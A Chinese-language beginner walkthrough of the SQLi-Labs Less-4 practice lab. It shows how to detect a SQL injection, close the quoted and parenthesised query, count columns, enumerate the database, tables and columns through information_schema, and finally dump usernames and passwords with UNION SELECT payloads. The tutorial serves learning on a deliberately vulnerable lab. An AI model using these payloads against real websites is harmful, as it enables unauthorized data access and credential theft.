SQL注入——初级SQli-Labs less 4

初级学习SQl注入

1.判断网页为动态还是静态

首先传递两个不同参数，网页显示不同，例如:?id=1 ,?id=2。显示不同为动态网页

2.判断是否存在SQL注入漏洞

输入?id=1\ 可以看到报错有回显，提示语法错误

可以看到报错信息 ' "1\") 可以知道可以看出输入方式（"id"）方式构成闭合

输入?id=1") and 1 =1 -- - 利用布尔表达式结果为真输出数据

输入?id=1") and 1=2 -- - 结果为假没有数据输出

可以看出此处存在sql注入漏洞。

3.判断几位字段

 首先输入?id=1")  order by 4 -- - 提示超出范围

 输入?id=1")  order by 3 -- - 如图出现数据

  经过以上判断可以看出显示字段3位。

4.判断那几位字段显示

输入语句?id=-1") union select 1,2,3 -- -    可以看到显示2，3，那么说明前端网页显示 2，3位字段

5.获取当前库，当前库的所有表，表里的字段

输入?id=-1") union select 1,2,database() -- - 获取库

输入?id=-1") union select 1,2,group_concat(distinct table_name) from information_schema.columns where table_schema=database() -- - 获取表名

输入?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- - users表里的字段

 6.对信息获取

利用上面我们找到了库，表，字段，进行获取

 输入?id=-1") union select 1,group_concat(username),group_concat(password) from users -- -